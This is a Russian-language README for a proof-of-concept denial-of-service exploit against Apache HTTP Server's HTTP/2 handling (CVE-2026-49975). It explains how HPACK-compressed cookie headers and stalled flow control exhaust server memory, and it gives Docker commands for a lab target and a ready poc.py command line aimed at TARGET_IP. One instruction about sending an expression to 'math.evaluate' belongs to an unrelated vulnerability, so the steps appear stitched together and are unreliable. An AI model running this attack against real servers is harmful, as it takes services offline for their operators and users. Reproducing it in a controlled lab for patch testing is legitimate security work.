
HTTP/2 Bomb
★ CVE-2026-49975 HTTP/2 Бомба PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975 — это уязвимость типа Отказ в обслуживании (DoS) в Apache HTTP Server. Уязвимость возникает в пути обработки запросов HTTP/2, где несколько полей заголовка
cookieмогут быть объединены без должного учёта вLimitRequestFields. Отправляя небольшой HTTP/2 запрос, закодированный в HPACK, который расширяется во множество полей заголовкаcookie, злоумышленник может заставить сервер многократно выделять память при слиянии заголовков Cookie. Затем злоумышленник может использовать управление потоком HTTP/2 для задержки передачи ответа, оставляя затронутые потоки открытыми и предотвращая освобождение выделенной памяти.
| Категория | Версия |
|---|---|
| Уязвимые | Apache HTTP Server 2.4.17 ≤ версия ≤ 2.4.67 |
| Исправленные | Apache HTTP Server 2.4.68 или новее |
Соберите и запустите уязвимое окружение Apache HTTP Server.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
После запуска уязвимого окружения выполните следующие шаги для воспроизведения атаки.
docker stats cve-2026-49975
Пример вывода:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
Отправьте следующее выражение в math.evaluate (например, через поле ввода вычислений приложения).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Проверьте, что использование памяти контейнера Apache увеличивается и остаётся высоким, пока атакующие потоки удерживаются открытыми.